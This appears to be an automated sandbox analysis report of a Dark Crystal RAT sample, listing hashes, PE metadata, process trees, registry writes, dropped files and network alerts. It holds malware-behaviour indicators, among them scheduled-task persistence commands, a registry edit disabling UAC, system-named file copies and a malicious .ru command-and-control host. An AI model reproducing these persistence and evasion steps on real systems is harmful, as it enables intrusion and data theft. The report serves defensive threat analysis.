Field | Value |
---|---|
File name: | 426c1596904a3573a97ddc6160a3d4ee.exe |
Full analysis: | https://app.any.run/tasks/6cf85c07-d4f9-4620-992e-3853abcef057 |
Verdict: | Malicious activity |
Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT) first introduced in 2018. It is modular malware that can be customized to perform different tasks: for instance, it can steal passwords and crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
Analysis date: | August 12, 2022, 18:11:43 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
MD5: | 426C1596904A3573A97DDC6160A3D4EE |
SHA1: | EC3306F2E5F30EB9624CA70567B8530E8D9CEEC5 |
SHA256: | C8EC1D81681F09CF6E7BEA58A602DBF454805BB86A7229474C40C95557800B1A |
SSDEEP: | 49152:xGaMScp6xTNhaak09rIs6HoE2bC+iDolssqgdstn:xZMScp69WZHoEIziD4sqden |
Extension | File type guess (match score) |
---|---|
.exe | Generic CIL Executable (.NET, Mono, etc.) (45.1) |
.exe | Win32 Executable MS Visual C++ (generic) (19.2) |
.exe | Win64 Executable (generic) (17) |
.scr | Windows screen saver (8) |
.dll | Win32 Dynamic Link Library (generic) (4) |
Version info field | Value |
---|---|
ProductVersion: | 5.15.2.0 |
ProductName: | libGLESv2 |
OriginalFileName: | libGLESv2.dll |
FileVersion: | 5.15.2.0 |
CharacterSet: | Unicode |
LanguageCode: | English (U.S.) |
FileSubtype: | - |
ObjectFileType: | Dynamic link library |
FileOS: | Win32 |
FileFlags: | (none) |
FileFlagsMask: | 0x003f |
ProductVersionNumber: | 5.15.2.0 |
FileVersionNumber: | 5.15.2.0 |
Subsystem: | Windows GUI |
SubsystemVersion: | 4 |
ImageVersion: | - |
OSVersion: | 4 |
EntryPoint: | 0x28afee |
UninitializedDataSize: | - |
InitializedDataSize: | 13824 |
CodeSize: | 2658304 |
LinkerVersion: | 6 |
PEType: | PE32 |
TimeStamp: | 2022:05:04 18:03:35+02:00 |
MachineType: | Intel 386 or later, and compatibles |
PE summary field | Value |
---|---|
Architecture: | IMAGE_FILE_MACHINE_I386 |
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 04-May-2022 16:03:35 |
Detected languages: | |
FileVersion: | 5.15.2.0 |
OriginalFilename: | libGLESv2.dll |
ProductName: | libGLESv2 |
ProductVersion: | 5.15.2.0 |
DOS header field | Value |
---|---|
Magic number: | MZ |
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000080 |
PE header field | Value |
---|---|
Signature: | PE |
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 4 |
Time date stamp: | 04-May-2022 16:03:35 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: | |
Name | Virtual Address | Virtual Size | Raw Size | Characteristics | Entropy |
---|---|---|---|---|---|
.text | 0x00002000 | 0x00288FF4 | 0x00289000 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 7.67673 |
.sdata | 0x0028C000 | 0x00002FDF | 0x00003000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.24212 |
.rsrc | 0x00290000 | 0x00000218 | 0x00000400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 1.82822 |
.reloc | 0x00292000 | 0x0000000C | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 0.10191 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 3.27357 | 448 | UNKNOWN | English - United States | RT_VERSION |
Imports: | mscoree.dll |
PID | CMD | Path | Indicators | Parent process | User | Integrity level | Exit code | Version |
---|---|---|---|---|---|---|---|---|
2908 | "C:\Users\admin\AppData\Local\Temp\426c1596904a3573a97ddc6160a3d4ee.exe" | C:\Users\admin\AppData\Local\Temp\426c1596904a3573a97ddc6160a3d4ee.exe | | Explorer.EXE | admin | MEDIUM | 0 | 5.15.2.0 |
2072 | schtasks.exe /create /tn "SearchProtocolHostS" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Recorded TV\Sample Media\SearchProtocolHost.exe'" /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | admin | MEDIUM | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
2256 | schtasks.exe /create /tn "SearchProtocolHost" /sc ONLOGON /tr "'C:\Users\Public\Recorded TV\Sample Media\SearchProtocolHost.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | admin | MEDIUM | 1 | 6.1.7600.16385 (win7_rtm.090713-1255) |
3108 | schtasks.exe /create /tn "SearchProtocolHostS" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Recorded TV\Sample Media\SearchProtocolHost.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | admin | MEDIUM | 1 | 6.1.7600.16385 (win7_rtm.090713-1255) |
4084 | schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\csrss.exe'" /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | admin | MEDIUM | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
272 | schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MSOCache\All Users\csrss.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | admin | MEDIUM | 1 | 6.1.7600.16385 (win7_rtm.090713-1255) |
2436 | schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\csrss.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | admin | MEDIUM | 1 | 6.1.7600.16385 (win7_rtm.090713-1255) |
3480 | schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\Users\admin\Documents\My Videos\taskhost.exe'" /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | admin | MEDIUM | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
1372 | schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Users\admin\Documents\My Videos\taskhost.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | admin | MEDIUM | 1 | 6.1.7600.16385 (win7_rtm.090713-1255) |
2672 | schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\Users\admin\Documents\My Videos\taskhost.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | admin | MEDIUM | 1 | 6.1.7600.16385 (win7_rtm.090713-1255) |

All schtasks.exe instances above carry Company: Microsoft Corporation and Description: Manages scheduled tasks. Every task creation that requested /rl HIGHEST exited with code 1, while the ones without it exited with code 0; all ran at MEDIUM integrity.
PID | Process | Key | Name | Operation | Value |
---|---|---|---|---|---|
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | EnableLUA | write | 0 |
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | HKEY_CURRENT_USER\Software\1d638093609d7a065edfcf4e5efcf67a0991208d | 05cb3a0ee021dacc97c23f62d827e2d631995c9f | write | |
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass | write | 1 |
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName | write | 1 |
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | write | 1 |
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | write | 0 |
2456 | taskhost.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | EnableLUA | write | 0 |
2456 | taskhost.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\taskhost_RASAPI32 | EnableFileTracing | write | 0 |
2456 | taskhost.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\taskhost_RASAPI32 | EnableConsoleTracing | write | 0 |
2456 | taskhost.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\taskhost_RASAPI32 | FileTracingMask | write | |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | C:\Users\admin\AppData\Local\Temp\kcvBAhpiNn | text | 868089A30C3C068F4CD66D74E645A420 | 638A5AFB7FEFA086B2503A49A2A2A3486CDF9FFF440B4A474603A379E61A8826 |
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | C:\MSOCache\All Users\taskeng.exe | executable | 426C1596904A3573A97DDC6160A3D4EE | C8EC1D81681F09CF6E7BEA58A602DBF454805BB86A7229474C40C95557800B1A |
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | C:\MSOCache\All Users\{90140000-001B-0412-0000-0000000FF1CE}-C\SearchIndexer.exe | executable | 426C1596904A3573A97DDC6160A3D4EE | C8EC1D81681F09CF6E7BEA58A602DBF454805BB86A7229474C40C95557800B1A |
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | C:\Users\Public\Recorded TV\Sample Media\SearchProtocolHost.exe | executable | 426C1596904A3573A97DDC6160A3D4EE | C8EC1D81681F09CF6E7BEA58A602DBF454805BB86A7229474C40C95557800B1A |
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | C:\MSOCache\All Users\csrss.exe | executable | 426C1596904A3573A97DDC6160A3D4EE | C8EC1D81681F09CF6E7BEA58A602DBF454805BB86A7229474C40C95557800B1A |
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | C:\MSOCache\All Users\{90140000-001A-0412-0000-0000000FF1CE}-C\winlogon.exe | executable | 426C1596904A3573A97DDC6160A3D4EE | C8EC1D81681F09CF6E7BEA58A602DBF454805BB86A7229474C40C95557800B1A |
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | C:\MSOCache\All Users\{90140000-00A1-0419-0000-0000000FF1CE}-C\SearchFilterHost.exe | executable | 426C1596904A3573A97DDC6160A3D4EE | C8EC1D81681F09CF6E7BEA58A602DBF454805BB86A7229474C40C95557800B1A |
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | C:\Users\admin\Videos\taskhost.exe | executable | 426C1596904A3573A97DDC6160A3D4EE | C8EC1D81681F09CF6E7BEA58A602DBF454805BB86A7229474C40C95557800B1A |
2456 | taskhost.exe | C:\Users\admin\AppData\Local\Temp\FVipfPOr3J | text | 46E5F9AFC53730D4231644DC5BA68722 | 6882F3AD37855F1656D613139B8214446638CB498D01866936487253D9966FA4 |
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | C:\MSOCache\All Users\{90140000-00A1-0419-0000-0000000FF1CE}-C\617403385cfa57 | text | DEEFE3A95DD6363F22B08E5039053ED0 | 210D3C5FB0D7ED0CC9DD288CA827C073D2FD9A0EF0A6895F24B2EF53A60A8D89 |

Every dropped executable has the same MD5 and SHA256 as the analysed sample itself, so these are byte-identical copies written under system-looking names (taskeng.exe, csrss.exe, winlogon.exe, SearchIndexer.exe, SearchProtocolHost.exe, SearchFilterHost.exe, taskhost.exe) in MSOCache and user media folders.
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2456 | taskhost.exe | 141.8.192.82:80 | a0703775.xsph.ru | Sprinthost.ru LLC | RU | malicious |
— | — | 141.8.192.82:80 | a0703775.xsph.ru | Sprinthost.ru LLC | RU | malicious |
Domain | IP | Reputation |
---|---|---|
a0703775.xsph.ru | | malicious |
PID | Process | Class | Message |
---|---|---|---|
2456 | taskhost.exe | A Network Trojan was detected | ET TROJAN DCRAT Activity (GET) |
2456 | taskhost.exe | Potentially Bad Traffic | ET INFO Observed POST to xsph .ru Domain |
2456 | taskhost.exe | A Network Trojan was detected | ET TROJAN Win32/DCRat CnC Exfil |
2456 | taskhost.exe | A Network Trojan was detected | ET INFO Observed Malicious Filename in Outbound POST Request (Information.txt) |
2456 | taskhost.exe | Potentially Bad Traffic | ET INFO Observed POST to xsph .ru Domain |
2456 | taskhost.exe | A Network Trojan was detected | ET TROJAN Win32/DCRat CnC Exfil |
2456 | taskhost.exe | A Network Trojan was detected | ET INFO Observed Malicious Filename in Outbound POST Request (Information.txt) |
2456 | taskhost.exe | Potentially Bad Traffic | ET INFO Observed POST to xsph .ru Domain |
2456 | taskhost.exe | A Network Trojan was detected | ET TROJAN Win32/DCRat CnC Exfil |
2456 | taskhost.exe | A Network Trojan was detected | ET INFO Observed Malicious Filename in Outbound POST Request (Information.txt) |